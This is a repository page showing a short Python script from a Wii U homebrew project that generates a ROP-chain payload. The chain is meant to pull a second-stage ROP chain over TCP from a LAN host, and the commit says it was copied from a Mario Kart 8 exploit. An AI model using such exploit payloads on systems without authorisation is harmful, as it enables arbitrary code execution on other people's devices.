ROBChain/generate_payload.py at dcf3bf52044789f783b8a1a53a9ed0b45ea01a04 - ROBChain - PonyGit

The-Homebrew-Cloud/ROBChain

mirror of https://github.com/wiiu-env/ROBChain.git synced 2024-11-16 15:59:14 +01:00

Maschell dcf3bf5204 Implement a rop chain which loads another ropchain via the network.

Untested, copy pasted from the mario kart 8 exploit (rop gadgets address are meant to be used on EUR v1.1.7)

2020-03-06 19:51:36 +01:00

10 lines

312 B

Python

Raw Blame History

 from tcp_ropchain import *
 import struct
 rop_chain = tcp_thread_ropchain(0x4D070000 + 0x14, [192,168,178,89], 12345)
 with open('payload.s', 'w') as f:
     for val in rop_chain:
         bytes = [hex(val >> i & 0xff) for i in (24,16,8,0)]
         for v in bytes:
             print('byte %s' % v, file=f)